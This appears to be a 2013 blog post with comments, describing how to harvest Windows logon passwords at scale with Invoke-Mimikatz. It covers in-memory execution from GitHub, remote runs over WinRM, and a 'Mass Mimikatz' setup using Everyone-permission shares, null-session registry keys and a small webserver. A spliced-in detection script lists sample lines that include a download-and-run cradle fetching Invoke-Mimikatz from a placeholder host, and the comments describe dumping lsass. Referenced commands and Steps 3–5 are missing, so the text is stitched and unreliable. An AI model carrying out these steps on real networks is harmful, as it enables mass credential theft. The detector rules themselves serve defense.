Friday, October 4, 2013

clymb3r recently posted a script called "Invoke-Mimikatz.ps1". Basically, what this does is reflectively inject mimikatz into memory, call for all the logonPasswords, and exit. It even checks the target's architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

(This works REALLY well for Citrix and Kiosk scenarios and it's too hard to type/remember)
This runs the PowerShell script by pulling it directly from GitHub and executing it "in memory" on your system.

One of the awesome added capabilities of this script is running it against a list of hosts, as so:

This works great, as all the output lands directly on your system and everything is executed through PowerShell Remoting. PowerShell Remoting is pretty much the same as WinRM. This service, however, is not enabled by default, and how widely any given enterprise uses WinRM is pretty hit or miss. That said, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default WinRM communication ports, 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn't a WinRM-rich environment, or you just want more passwords, you can take a slightly more painful route. I call it "Mass Mimikatz".

Step 1. Make a share. We are doing this not only so we can collect the password output from all of our computers, but also to host the CMD batch file that will run the PowerShell script:

We are setting "Everyone" permissions at both the share (net share) and NTFS (icacls) level for this to work properly.

Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share, and the second gives null users the "Everyone" token so that we don't have to get crazy with our permissions. I have created a meterpreter script with a bunch of error checking here: massmimi_reg.rb

Step 6. Upload mongoose: Downloads Page - Both the regular and tiny versions work. This is an awesome, single-executable webserver that supports Lua, SQLite, and WebDAV out of the box. The tiny version is under 100k.

Step 7. Upload serverlist.txt - This is a line-by-line list of computer names to run mimikatz on. You'll have to gather this one way or another.

Step 8. Execute mongoose (from the directory containing mimikatz.ps1) - This will start a listener with directory listings enabled, on port 8080 by default.
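The procedure above leaves recognisable process command lines behind: a PowerShell download cradle invoking Invoke-Mimikatz, and net share / icacls calls granting "Everyone". As an added example that is not part of the original post, this small Python detector runs such rules over constructed 4688/Sysmon-style command-line records; the rule names, patterns and sample lines are all my own assumptions, not anything from the post.

```python
import re

# Detection rules for the tradecraft described in the post. Each pattern is
# matched case-insensitively against a process command line, e.g. the
# CommandLine field of a Windows 4688 or Sysmon Event ID 1 record.
# Rule names and patterns are assumptions made for this example.
RULES = {
    # PowerShell fetching a script over HTTP and running it in memory, in either
    # order of IEX and the download call.
    "powershell_remote_download_exec": re.compile(
        r"powershell.*(DownloadString|DownloadFile|Net\.WebClient).*\b(IEX|Invoke-Expression)\b"
        r"|powershell.*\b(IEX|Invoke-Expression)\b.*(DownloadString|DownloadFile|Net\.WebClient)",
        re.I),
    "invoke_mimikatz": re.compile(r"Invoke-Mimikatz", re.I),
    # Share-level and NTFS-level "Everyone" grants (Step 1 of the post).
    "share_everyone_grant": re.compile(r"\bnet\s+share\b.*/grant:everyone", re.I),
    "icacls_everyone_grant": re.compile(r"\bicacls\b.*/grant\s+(\*S-1-1-0|everyone)", re.I),
}

# Constructed sample records: three malicious-looking lines and two benign ones.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -nop -exec bypass IEX (New-Object Net.WebClient)'
    '.DownloadString("https://example.invalid/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds',
    'net share massmimi=C:\\Users\\Public\\mm /grant:everyone,full',
    'icacls C:\\Users\\Public\\mm /grant Everyone:(OI)(CI)F /T',
    'powershell.exe -Command Get-Process',
    'C:\\Windows\\System32\\svchost.exe -k netsvcs',
]


def scan_command_lines(lines):
    """Return (rule_name, line) pairs for every rule that fires on each line."""
    hits = []
    for line in lines:
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((name, line))
    return hits


def count_by_rule(hits):
    """Aggregate hits into {rule_name: count} for a quick triage view."""
    counts = {}
    for name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for name, line in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"[{name}] {line}")
```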

6 comments:

Anonymous said...

I'd rather get lsass.exe process memory (via procdump.exe for example) from everyone, and then run minidump from mimikatz locally (http://blog.gentilkiwi.com/securite/mimikatz/minidump). At least, you won't make any dll injection to any host but yours.

Yeah, but each of those outputs is about 40MB per host, more if it's a big server. You may be in a position not to care about moving that much data around, but if you have to pull it down to a remote host off the network you certainly will.

It's worth noting that there isn't "DLL injection" happening. PowerShell is reflectively loading mimikatz.dll into the PowerShell process. The worst thing that could happen if the code has bugs is that PowerShell would crash, but NOT lsass.

Once I have valid creds I use psexec_command to gain shells with PowerShell. I then wrote a Metasploit post module that will load mimikatz and dump the passwords to the creds db. I also wrote a resource file that will loop through all available sessions.